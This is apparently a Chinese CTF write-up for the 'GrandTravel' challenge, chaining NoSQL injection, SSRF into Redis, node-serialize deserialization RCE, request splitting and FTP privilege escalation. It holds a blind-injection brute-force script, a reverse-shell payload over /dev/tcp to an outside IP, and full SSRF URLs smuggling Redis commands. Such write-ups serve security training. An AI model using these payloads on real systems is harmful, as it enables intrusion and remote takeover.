GrandTravel
0x01 知识点
nosql注入+ssrf+node反序列化+node拆分攻击+ftp提权
0x02 解题
1 sql注入拿到密码
首先拿到源码不难看出登录位置有注入嫌疑(感谢葫芦卜师傅的payload)
参考
https://blog.szfszf.top/article/9/
burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
# requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
贴上sql注入的exp
import requests,time
url = "http://192.168.76.128:3000/login"
username=""
for pos in range(0,100):
for mid in range(35,128):
ti = time.time()
burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]<\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
requests.post(url,data=burp0_data)
tim = time.time()
# burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
if(tim - ti > 1):
print(burp0_data["username"])
username += chr(mid-1)
print(username)
break
# ip 192.168.76.1
2 ssrf 打redis反序列化数据
192.168.76.1 ip
所以redis中的key为
admin492a66848a0b6c73cff8f5b4ace752f9
先访问signup端口创建一个redis缓存数据。
然后我们用gopher去生成反序列化数据
3 node反序列化rce
https://threezh1.com/2020/01/30/NodeJsVulns/#node-serialize%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E-CVE-2017-5941
serialize = require('node-serialize');
var test = {
rce : function(){require('child_process').exec('bash -i >& /dev/tcp/ip/8080 0>&1',function(error, stdout, stderr){console.log(stdout)})},
}
console.log("序列化生成的 Payload: \n" + new Buffer(serialize.serialize(test)).toString('base64'));
生成我们需要的exp。但是我们在反序列化的时候需要我们执行相应的函数,所以需要加上()
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('bash -i >& /dev/tcp/ip/8080 0>&1',function(error, stdout, stderr){console.log(stdout)});}()"}
然后生成redis
*2
$4
AUTH
$31
Red1S_P0ssw0rd_a456wd4654aw54wd
*1
$7
COMMAND
*3
$3
set
$36
admin492a66848a0b6c73cff8f5b4ace752f9
$224
payload
http://0:6379/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A$31%C4%8D%C4%8ARed1S_P0ssw0rd_a456wd4654aw54wd%C4%8D%C4%8A*1%C4%8D%C4%8A$7%C4%8D%C4%8ACOMMAND%C4%8D%C4%8A*3%C4%8D%C4%8A$3%C4%8D%C4%8Aset%C4%8D%C4%8A$36%C4%8D%C4%8Admin492a66848a0b6c73cff8f5b4ace752f9%C4%8D%C4%8A$224%C4%8D%C4%8AeyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnYmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0Mi45My4xMDMvODA4MCAwPiYxJyxmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpe2NvbnNvbGUubG9nKHN0ZG91dCl9KSgpO30ifQ==%C4%8D%C4%8A
这里需要注意我们在传递参数的时候url编码问题会把+号译码成为空格,所以我们需要对+号进行url编码
http://0:6379/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A$31%C4%8D%C4%8ARed1S_P0ssw0rd_a456wd4654aw54wd%C4%8D%C4%8A*1%C4%8D%C4%8A$7%C4%8D%C4%8ACOMMAND%C4%8D%C4%8A*3%C4%8D%C4%8A$3%C4%8D%C4%8Aset%C4%8D%C4%8A$36%C4%8D%C4%8Admin492a66848a0b6c73cff8f5b4ace752f9%C4%8D%C4%8A$224%C4%8D%C4%8AeyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnYmFzaCAtaSA%2bJiAvZGV2L3RjcC84LjE0Mi45My4xMDMvODA4MCAwPiYxJyxmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpe2NvbnNvbGUubG9nKHN0ZG91dCl9KSgpO30ifQ==%C4%8D%C4%8A
4 ftp提权
可以看到ftp,但是我们在连接vps的服务时候发现不能成功上传文件,原因是因为ftp的被动模式返回的ip变成了内网ip,导致gg,所以我们要用node重新启动一个ftp server。然后下载准备好的东西。
然后就成功拿到。